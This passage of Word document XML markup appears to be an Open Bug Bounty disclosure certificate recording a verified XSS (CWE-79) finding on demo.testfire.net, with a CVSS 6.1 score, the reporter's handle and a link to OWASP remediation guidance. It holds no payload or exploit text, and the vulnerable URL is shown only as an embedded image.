          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ISO 29147</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> standard, Open Bug Bounty has:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      a. verified the vulnerability and confirmed its existence;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">      b. notified the website operator about its existence.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="360710"/>
        <w:tblW w:w="8773" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3074"/>
        <w:gridCol w:w="5699"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Affected Website:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "http://demo.testfire.net/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Open Bug Bounty Program:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/bugbounty/create/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Create your bounty program now</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>. It's open and free.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Vulnerable Application:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Custom Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Vulnerability Type:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://owasp.org/www-community/attacks/xss/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>XSS (Cross Site Scripting)</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>/ CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>CVSSv3 Score:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Discovered and Reported by:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/Disst/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Disst</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3074" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
                <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Remediation Guide:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5699" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F7F7F7" w:val="clear" w:color="auto"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
                <w:b w:val="true"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>OWASP XSS Prevention Cheat Sheet</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="F77A00"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="F77A00"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vulnerable URL:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="400969"/>
        <w:tblW w:w="8415" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8415"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="384"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="4C4C4C" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="4C4C4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distR="0" distB="95097" distL="0">
                  <wp:extent cx="6596062" cy="170021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6596062" cy="1700212"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="C2C2C2"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="F77A00"/>
